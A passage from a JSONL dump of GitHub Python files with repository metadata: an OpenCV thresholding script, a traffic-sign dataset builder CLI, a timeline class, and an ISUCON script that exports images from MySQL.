Merge_LAB', 'Threshold - Blending_L', 'Threshold - Blending_LAB', 'Original Img']\r\n# images = [resultImg, resultImg1, resultImg2, resultImg3, img]\r\n# showPlot(titles, images)\r\n\r\nviewData = {'Threshold - Merge_L' : resultImg, 'Threshold Merge_LAB' : resultImg1, 'Threshold - Blending_L' : resultImg2, 'Threshold - Blending_LAB' : resultImg3, 'Original Img': img}\r\nviewResult2(viewData, 2, 'gray')\r\n\r\n\r\n# showImg('Result Img', resultImg)\r\n\r\n# rt.thresholding(resultImg)\r\n# rt.thresholding(resultImg1)\r\n# rt.thresholding(resultImg2)\r\n# rt.thresholding(resultImg3)\r\n\r\n\r\n#viewData = {'Original': img, 'Gray Img' : img_gray, 'Alpha Img' : img_alp}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "SSKim76/Python_Test", "sub_path": "removeGradation.py", "file_name": "removeGradation.py", "file_ext": "py", "file_size_in_byte": 6904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.cv2.cvtColor", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 28, "usage_type": "name"}, {"api_name": "cv2.cv2.COLOR_BGR2LAB", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cv2.cv2.medianBlur", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 32, "usage_type": "name"}, {"api_name": "cv2.cv2.bitwise_not", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 37, "usage_type": "name"}, {"api_name": "cv2.cv2.add", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 41, "usage_type": "name"}, {"api_name": "cv2.cv2.addWeighted", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 44, "usage_type": "name"}, {"api_name": "cv2.cv2.threshold", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 49, "usage_type": "name"}, {"api_name": "cv2.cv2.THRESH_BINARY", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cv2.cv2.THRESH_OTSU", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cv2.cv2.adaptiveThreshold", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 54, "usage_type": "name"}, {"api_name": "cv2.cv2.ADAPTIVE_THRESH_MEAN_C", "line_number": 54, "usage_type": "attribute"}, {"api_name": "cv2.cv2.THRESH_BINARY", "line_number": 54, "usage_type": "attribute"}, {"api_name": "cv2.cv2.adaptiveThreshold", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 55, "usage_type": "name"}, {"api_name": "cv2.cv2.ADAPTIVE_THRESH_GAUSSIAN_C", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cv2.cv2.THRESH_BINARY", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cv2.cv2.imshow", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 63, "usage_type": "name"}, {"api_name": "cv2.cv2.waitKey", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 65, "usage_type": "name"}, {"api_name": "cv2.cv2.destroyAllWindows", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "cv2.cv2.imread", "line_number": 140, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 140, "usage_type": "name"}, {"api_name": "cv2.cv2.IMREAD_COLOR", "line_number": 140, "usage_type": "attribute"}, {"api_name": "cv2.cv2.split", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 163, "usage_type": "attribute"}, {"api_name": "cv2.cv2.cvtColor", "line_number": 181, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 181, "usage_type": "name"}, {"api_name": "cv2.cv2.COLOR_LAB2BGR", "line_number": 181, "usage_type": "attribute"}, {"api_name": "cv2.cv2.cvtColor", "line_number": 182, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 182, "usage_type": "name"}, {"api_name": "cv2.cv2.COLOR_BGR2GRAY", "line_number": 182, "usage_type": "attribute"}]}
+{"seq_id": "985754575", "text": "import sys, os, argparse, csv, zipfile\nimport xml.etree.ElementTree as ET\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\n\nclass Generator():\n\n def __init__(self, path, classes=range(1, 156)):\n self.classes = classes\n self.labelmap = {0: \"speed limit 20 (prohibitory)\",\n 1: \"speed limit 30 (prohibitory)\",\n 2: \"speed limit 50 (prohibitory)\",\n 3: \"speed limit 60 (prohibitory)\",\n 4: \"speed limit 70 (prohibitory)\",\n 5: \"speed limit 80 (prohibitory)\",\n 6: \"restriction ends 80 (other)\",\n 7: \"speed limit 100 (prohibitory)\",\n 8: \"speed limit 120 (prohibitory)\",\n 9: \"no overtaking (prohibitory)\",\n 10: \"no overtaking (trucks) (prohibitory)\",\n 11: \"priority at next intersection (danger)\",\n 12: \"priority road (other)\",\n 13: \"give way (other)\",\n 14: \"stop (other)\",\n 15: \"no traffic both ways (prohibitory)\",\n 16: \"no trucks (prohibitory)\",\n 17: \"no entry (other)\",\n 18: \"danger (danger)\",\n 19: \"bend left (danger)\",\n 20: \"bend right (danger)\",\n 21: \"bend (danger)\",\n 22: \"uneven road (danger)\",\n 23: \"slippery road (danger)\",\n 24: \"road narrows (danger)\",\n 25: \"construction (danger)\",\n 26: \"traffic signal (danger)\",\n 27: \"pedestrian crossing (danger)\",\n 28: \"school crossing (danger)\",\n 29: \"cycles crossing (danger)\",\n 30: \"snow (danger)\",\n 31: \"animals (danger)\",\n 32: \"restriction ends (other)\",\n 33: \"go right (mandatory)\",\n 34: \"go left (mandatory)\",\n 35: \"go straight (mandatory)\",\n 36: \"go right or straight (mandatory)\",\n 37: \"go left or straight (mandatory)\",\n 38: \"keep right (mandatory)\",\n 39: \"keep left (mandatory)\",\n 40: \"roundabout (mandatory)\",\n 41: \"restriction ends (overtaking) (other)\",\n 42: \"restriction ends (overtaking (trucks)) (other)\",\n 43: \"restriction ends 60 (other)\",\n 44: \"restriction ends 70 (other)\",\n 45: \"speed limit 90 (prohibitory)\",\n 46: \"restriction ends 90 (other)\",\n 47: \"speed limit 110 (prohibitory)\",\n 48: \"restriction ends 110 (other)\",\n 49: \"restriction ends 120 (other)\",\n 50: \"speed limit 130 (prohibitory)\",\n 51: \"restriction ends 130 (other)\",\n 52: \"bend double right (danger)\",\n 53: \"highway turn (left) (other)\",\n 54: \"maximum width (prohibitory)\",\n 55: \"maximum height (prohibitory)\",\n 56: \"minimum truck distance (prohibitory)\",\n 57: \"highway exit 200 (other)\",\n 58: \"highway exit 100 (other)\",\n 59: \"right lane merging (other)\",\n 60: \"warning beacon roadwork (other)\",\n 61: \"speed limit 60 (digital) (prohibitory)\",\n 62: \"restriction ends 60 (digital) (other)\",\n 63: \"speed limit 70 (digital) (prohibitory)\",\n 64: \"restriction ends 70 (digital) (other)\",\n 65: \"speed limit 80 (digital) (prohibitory)\",\n 66: \"restriction ends 80 (digital) (other)\",\n 67: \"restriction ends 80 (digital) (other)\",\n 68: \"restriction ends 90 (digital) (other)\",\n 69: \"speed limit 100 (digital) (prohibitory)\",\n 70: \"restriction ends 100 (digital) (other)\",\n 71: \"speed limit 110 (digital) (prohibitory)\",\n 72: \"restriction ends 110 (digital) (other)\",\n 73: \"left lane merging (other)\",\n 74: \"speed limit 120 (digital) (prohibitory)\",\n 75: \"restriction ends 120 (digital) (other)\",\n 76: \"speed limit 130 (digital) (prohibitory)\",\n 77: \"restriction ends 130 (digital) (other)\",\n 78: \"no overtaking (digital) (prohibitory)\",\n 79: \"restriction ends 130 (digital) (other)\",\n 80: \"no overtaking (trucks) (digital) (prohibitory)\",\n 81: \"restriction ends (overtaking (trucks)) (other)\",\n 82: \"construction (digital) (danger)\",\n 83: \"traffic jam (digital) (danger)\",\n 84: \"highway exit (other)\",\n 85: \"traffic jam (other)\",\n 86: \"restriction distance (other)\",\n 87: \"restriction time (other)\",\n 88: \"highway exit 300m (other)\",\n 89: \"restriction ends 100 (other)\",\n 90: \"andreaskreuz (other)\",\n 91: \"one way street (left) (other)\",\n 92: \"one way street (right) (other)\",\n 93: \"beginning of highway (other)\",\n 94: \"end of highway (other)\",\n 95: \"busstop (other)\",\n 96: \"tunnel (other)\",\n 97: \"no cars (prohibitory)\",\n 98: \"train crossing (danger)\",\n 99: \"no bicycles (prohibitory)\",\n 100: \"no motorbikes (prohibitory)\",\n 101: \"no mopeds (prohibitory)\",\n 102: \"no horses (prohibitory)\",\n 103: \"no cars & motorbikes (prohibitory)\",\n 104: \"busses only (mandatory)\",\n 105: \"pedestrian zone (mandatory)\",\n 106: \"bicycle boulevard (mandatory)\",\n 107: \"end of bicycle boulevard (mandatory)\",\n 108: \"bicycle path (mandatory)\",\n 109: \"pedestrian path (mandatory)\",\n 110: \"pedestrian and bicycle path (mandatory)\",\n 111: \"separated path for bicycles and pedestrians (right) (mandatory)\",\n 112: \"separated path for bicycles and pedestrians (left) (mandatory)\",\n 113: \"play street (other)\",\n 114: \"end of play street (other)\",\n 115: \"beginning of motorway (other)\",\n 116: \"end of motorway (other)\",\n 117: \"crosswalk (zebra) (other)\",\n 118: \"dead-end street (other)\",\n 119: \"one way street (straight) (other)\",\n 120: \"priority road (other)\",\n 121: \"no stopping (prohibitory)\",\n 122: \"no stopping (beginning) (prohibitory)\",\n 123: \"no stopping (middle) (prohibitory)\",\n 124: \"no stopping (end) (prohibitory)\",\n 125: \"no parking (beginning) (prohibitory)\",\n 126: \"no parking (end) (prohibitory)\",\n 127: \"no parking (middle) (prohibitory)\",\n 128: \"no parking (prohibitory)\",\n 129: \"no parking zone (prohibitory)\",\n 130: \"end of no parking zone (prohibitory)\",\n 131: \"city limit (in) (other)\",\n 132: \"city limit (out) (other)\",\n 133: \"direction to village (other)\",\n 134: \"rural road exit (other)\",\n 135: \"speed limit 20 zone (prohibitory)\",\n 136: \"end speed limit 20 zone (prohibitory)\",\n 137: \"speed limit 30 zone (prohibitory)\",\n 138: \"end speed limit 30 zone (prohibitory)\",\n 139: \"speed limit 5 (prohibitory)\",\n 140: \"speed limit 10 (prohibitory)\",\n 141: \"restriction ends 10 (other)\",\n 142: \"restriction ends 20 (other)\",\n 143: \"restriction ends 30 (other)\",\n 144: \"speed limit 40 (prohibitory)\",\n 145: \"restriction ends 40 (other)\",\n 146: \"restriction ends 50 (other)\",\n 147: \"go left (now) (mandatory)\",\n 148: \"go right (now) (mandatory)\",\n 149: \"train crossing in 300m (other)\",\n 150: \"train crossing in 200m (other)\",\n 151: \"train crossing in 100m (other)\",\n 152: \"danger (digital) (danger)\",\n 153: \"restriction ends 100 (other)\",\n 154: \"highway turn (right) (other)\"}\n\n self.PATH = path\n self.label_names = []\n self.label_paths = []\n\n for p, dirs, filenames in os.walk(self.PATH):\n self.label_names += [f for f in filenames if f[-3:] == 'xml']\n self.label_paths += [os.path.join(p, f) for f in filenames if f[-3:] == 'xml']\n\n self.class_score = self._calculateClassScore()\n\n def deleteEmptyImages(self, path=None):\n if not path:\n path = self.PATH\n\n for p, dirs, filenames in os.walk(path):\n for file in [f for f in filenames if f[-3:] == 'png']:\n if file[:-3] + 'xml' not in self.label_names:\n os.remove(os.path.join(p, file))\n print(\"%i deleted due to missing label!\" % (os.path.join(p, file)))\n\n def _calculateClassScore(self, ):\n class_score = {}\n\n for label in self.label_paths:\n\n for ob in ET.parse(label).getroot().iter('object'):\n\n try:\n clazz = int(ob.find('name').text)\n xmin, ymin, xmax, ymax = [int(v.text) for v in ob.find('bndbox')]\n except:\n print(\"Fehlerhafte Klassenangabe in \" + label)\n continue\n\n if clazz in class_score:\n class_score[clazz][0] += 1\n class_score[clazz][1] += xmin\n class_score[clazz][2] += ymin\n class_score[clazz][3] += xmax\n class_score[clazz][4] += ymax\n else:\n class_score[clazz] = [1, xmin, ymin, xmax, ymax]\n\n for c in class_score:\n s = class_score[c][0]\n class_score[c][1] = round(class_score[c][1] / s, 2)\n class_score[c][2] = round(class_score[c][2] / s, 2)\n class_score[c][3] = round(class_score[c][3] / s, 2)\n class_score[c][4] = round(class_score[c][4] / s, 2)\n return class_score\n\n def _getClassName(self, i):\n if i in self.labelmap:\n return self.labelmap[i]\n else:\n return \"Unknown\"\n\n def createCSVOverview(self, zipf=None):\n\n with open(os.path.join(self.PATH, \"Summary.csv\"), 'w', newline='') as out:\n writer = csv.writer(out, delimiter=',', quoting=csv.QUOTE_NONE)\n writer.writerow(['Class ID', 'Class Name', 'Frequency', 'Avg Xmin', 'Avg Ymin', 'Avg Xmax', 'Avg Ymax'])\n for c in self.class_score:\n if c in self.classes:\n writer.writerow([c, self._getClassName(c), *self.class_score[c]])\n\n if zipf:\n zipf.write(os.path.join(self.PATH, 'Summary.csv'), 'Summary.csv', zipfile.ZIP_DEFLATED)\n os.remove(os.path.join(self.PATH, 'Summary.csv'))\n print(\"CSV Overview successfully created.\")\n\n def createPieChart(self, zipf=None):\n fig, ax = plt.subplots(figsize=(72, 36), subplot_kw=dict(aspect=\"equal\"))\n\n data = [self.class_score[x][0] for x in self.class_score if x in self.classes]\n label = [self._getClassName(x) for x in self.class_score if x in self.classes]\n\n def func(pct, allvals):\n absolute = int(pct / 100. * np.sum(allvals))\n return \"{:.1f}% ({:d})\".format(pct, absolute)\n\n wedges, texts, autotexts = ax.pie(data, autopct=lambda pct: func(pct, data),\n textprops=dict(color=\"w\"))\n\n legend = ax.legend(wedges, label,\n title=\"Klassen\",\n loc=\"center left\",\n bbox_to_anchor=(1, 0, 0.5, 1),\n prop={'size': 44});\n\n plt.setp(autotexts, size=34, weight=\"bold\")\n plt.setp(legend.get_title(), fontsize=64)\n ax.text(0.3, 0.1, \"Total number of objects: %d\" % (np.sum(data)), fontsize=44, transform=plt.gcf().transFigure)\n ax.set_title(\"Klassenverteilung\", fontsize=64)\n fig.savefig(os.path.join(self.PATH, 'Class Distribution.png'))\n\n if zipf:\n zipf.write(os.path.join(self.PATH, 'Class Distribution.png'), 'Class Distribution.png',\n zipfile.ZIP_DEFLATED)\n os.remove(os.path.join(self.PATH, 'Class Distribution.png'))\n print(\"Pie chart successfully created.\")\n\n def createDataSetZIP(self, name = None, sep = None, split = None):\n if not name:\n name = 'DataSet.zip'\n\n if split:\n t = int(len(self.label_paths) / 100 * split)\n train = range(t)\n random.shuffle(list(train))\n else:\n train = range(len(self.label_paths))\n\n\n with zipfile.ZipFile(os.path.join(self.PATH, name), 'w') as zip_file:\n\n for i in range(len(self.label_paths)):\n if split:\n if i in train:\n folder = 'Train/'\n else:\n folder = 'Test/'\n else:\n folder = ''\n\n label = self.label_paths[i]\n xml = label.split(os.path.sep)[-1]\n img = xml[:-3] + \"png\"\n\n for ob in ET.parse(label).getroot().iter('object'):\n c = int(ob.find('name').text)\n if c in self.classes:\n img_added = []\n zip_file.write(label, os.path.join(folder + 'Labels', xml), zipfile.ZIP_DEFLATED)\n\n for p, dirs, files in os.walk(self.PATH):\n if img in files:\n if img not in img_added:\n zip_file.write(os.path.join(p, img), os.path.join(folder + \"Images\", img),\n zipfile.ZIP_DEFLATED)\n img_added.append(img)\n else:\n break\n break\n\n if not sep:\n self.createPieChart(zip_file)\n self.createCSVOverview(zip_file)\n self.createCSVLabelMap(zip_file)\n\n def createCSVLabelMap(self, zipf=None):\n xml_list = []\n\n for label in self.label_paths:\n tree = ET.parse(label)\n root = tree.getroot()\n\n for member in root.findall('object'):\n clazz = int(member.find('name').text)\n\n if clazz in self.classes:\n value = (root.find('filename').text,\n int(root.find('size')[0].text),\n int(root.find('size')[1].text),\n self._getClassName(int(member[0].text)),\n int(member[4][0].text),\n int(member[4][1].text),\n int(member[4][2].text),\n int(member[4][3].text)\n )\n xml_list.append(value)\n column_name = ['filename', 'width', 'height', 'class', 'xmin', 'ymin', 'xmax', 'ymax']\n xml_df = pd.DataFrame(xml_list, columns=column_name)\n xml_df.to_csv(os.path.join(self.PATH, 'train.csv'), index=None)\n\n if zipf:\n zipf.write(os.path.join(self.PATH, 'train.csv'), 'labels.csv', zipfile.ZIP_DEFLATED)\n os.remove(os.path.join(self.PATH, 'train.csv'))\n print(\"Label CSV successfully created.\")\n\n\nclass FullPaths(argparse.Action):\n \"\"\"Expand user- and relative-paths\"\"\"\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, os.path.abspath(os.path.expanduser(values)))\n\n\ndef is_dir(dirname):\n \"\"\"Checks if a path is an actual directory\"\"\"\n if not os.path.isdir(dirname):\n msg = \"{0} is not a directory\".format(dirname)\n raise argparse.ArgumentTypeError(msg)\n else:\n return dirname\n\n\ndef main(argv):\n parser = argparse.ArgumentParser(description='Generate Data Sets for Object detection!')\n parser.add_argument('-p', help=\"Pfad zum Ordner des Datasets.\", action=FullPaths, type=is_dir, metavar='PATH')\n\n parser.add_argument('-c', help=\"Bestimmte Klassen setzen.\", metavar='classes', type=int, nargs='*')\n parser.add_argument('--zip', help='Komplettes Datenset als zip erstellen.', dest='zip', action='store_true')\n parser.add_argument('--stat_csv', help='Klassen Statistik als csv erstellen.', dest='csv', action='store_true')\n parser.add_argument('--stat_img', help='Klassen Statistik als png erstellen.', dest='img', action='store_true')\n parser.add_argument('--del_img', help='Bilder ohne Label löschen.', dest='delete', action='store_true')\n parser.add_argument('--train_csv', help='Train.csv für Object Detection erstellen.', dest='train', action='store_true')\n parser.add_argument('--sep_class', help='ZIP für jeden Klasse einzelnd erstellen.', dest='sep', action='store_true')\n parser.add_argument('--split', help=\"Train/Test Split - % für Train\", dest='split', type=int)\n\n args = parser.parse_args(argv)\n\n if args.c:\n generator = Generator(args.p, args.c)\n else:\n generator = Generator(args.p)\n\n if args.delete:\n generator.deleteEmptyImages()\n\n if args.zip:\n if not args.sep:\n if args.split:\n generator.createDataSetZIP(split=args.split)\n else:\n generator.createDataSetZIP()\n else:\n if args.c:\n classes = args.c\n else:\n classes = range(1, 155)\n for c in classes:\n gen = Generator(args.p, [c])\n name = 'Class_' + str(c) + '.zip'\n if args.split:\n gen.createDataSetZIP(name=name, sep=True, split=args.split)\n print(name + \"- wurde erzeugt!\")\n else:\n gen.createDataSetZIP(name=name, sep=True)\n print(name + \"- wurde erzeugt!\")\n\n if args.csv:\n generator.createCSVOverview()\n\n if args.img:\n generator.createPieChart()\n\n if args.train:\n generator.createCSVLabelMap()\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])", "repo_name": "Project-Road-Sign-Detection/Tensorflow-Street-Sign-Recognition", "sub_path": "Data Set Pipeline/DataSetCLI.py", "file_name": "DataSetCLI.py", "file_ext": "py", "file_size_in_byte": 20036, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 47, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.walk", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path", "line_number": 174, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 182, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path", "line_number": 185, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 186, "usage_type": "call"}, {"api_name": "os.path", "line_number": 186, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 193, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 193, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 227, "usage_type": "call"}, {"api_name": "os.path", "line_number": 227, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 228, "usage_type": "call"}, {"api_name": "csv.QUOTE_NONE", "line_number": 228, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path", "line_number": 235, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 235, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path", "line_number": 236, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 259, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 259, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 262, "usage_type": "call"}, {"api_name": "os.path", "line_number": 262, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 265, "usage_type": "call"}, {"api_name": "os.path", "line_number": 265, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 266, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path", "line_number": 267, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 277, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path", "line_number": 282, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 294, "usage_type": "name"}, {"api_name": "os.path", "line_number": 294, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 295, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 297, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 297, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 301, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 301, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 301, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 301, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 303, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 306, "usage_type": "call"}, {"api_name": "os.path", "line_number": 306, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 307, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 322, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 322, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 341, "usage_type": "call"}, {"api_name": "os.path", "line_number": 341, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 344, "usage_type": "call"}, {"api_name": "os.path", "line_number": 344, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 344, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 345, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 345, "usage_type": "call"}, {"api_name": "os.path", "line_number": 345, "usage_type": "attribute"}, {"api_name": "argparse.Action", "line_number": 349, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path", "line_number": 352, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 357, "usage_type": "call"}, {"api_name": "os.path", "line_number": 357, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 359, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 365, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 419, "usage_type": "attribute"}]}
+{"seq_id": "26972475259", "text": "from sortedcontainers import SortedSet\nfrom request import Request\nfrom response import Response\n\n\nclass Timeline:\n def __init__(self, requests_file_name):\n self.timeline = SortedSet(key=lambda x: x.finish_time if type(x) is Response else x.created_time)\n with open(requests_file_name) as requests_input_file:\n for line in requests_input_file:\n tokens = line.split()\n time, app_name = int(tokens[0]), tokens[1]\n self.add(Request(app_name, time))\n\n def get_next(self):\n return self.timeline.pop(0) if len(self.timeline) else None\n\n def add(self, obj):\n self.timeline.add(obj)\n\n def iterate(self):\n while True:\n next_elem = self.get_next()\n if next_elem:\n yield next_elem\n else:\n break\n", "repo_name": "maxxaon/kursovaya", "sub_path": "scaler_Marin/timeline.py", "file_name": "timeline.py", "file_ext": "py", "file_size_in_byte": 850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sortedcontainers.SortedSet", "line_number": 8, "usage_type": "call"}, {"api_name": "response.Response", "line_number": 8, "usage_type": "name"}, {"api_name": "request.Request", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "19189003342", "text": "from dc import *\nfrom sqlalchemy.pool import QueuePool\nimport mysql.connector\nimport os\n\nmysql_connection_env = {\n \"host\": getenv(\"MYSQL_HOST\", \"127.0.0.1\"),\n \"port\": getenv(\"MYSQL_PORT\", 3306),\n \"user\": getenv(\"MYSQL_USER\", \"isucon\"),\n \"password\": getenv(\"MYSQL_PASS\", \"isucon\"),\n \"database\": getenv(\"MYSQL_DBNAME\", \"isucondition\"),\n \"time_zone\": \"+09:00\",\n}\ndef select_all(cnxpool, query, *args, dictionary=True):\n cnx = cnxpool.connect()\n try:\n cur = cnx.cursor(dictionary=dictionary)\n cur.execute(query, *args)\n return cur.fetchall()\n finally:\n cnx.close()\n\n\n# コネクションプール サイズ10\ncnxpool = QueuePool(lambda: mysql.connector.connect(**mysql_connection_env), pool_size=10)\n\nquery = \"\"\"\n SELECT * FROM `isu` ORDER BY `id` DESC\n\"\"\"\nisu_list = [Isu(**row) for row in select_all(cnxpool, query, ())]\n\nfor isu in isu_list:\n image = isu.image\n filepath = APP_ROUTE + f\"api/isu/{isu.jia_isu_uuid}/icon\"\n os.makedirs(os.path.dirname(filepath), exist_ok=True)\n with open(filepath, \"wb\") as f:\n f.write(image)\n", "repo_name": "lapras-inc/ISUCON-11-manin", "sub_path": "python/_export_icon.py", "file_name": "_export_icon.py", "file_ext": "py", "file_size_in_byte": 1100, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.pool.QueuePool", "line_number": 25, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 25, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 25, "usage_type": "name"}, 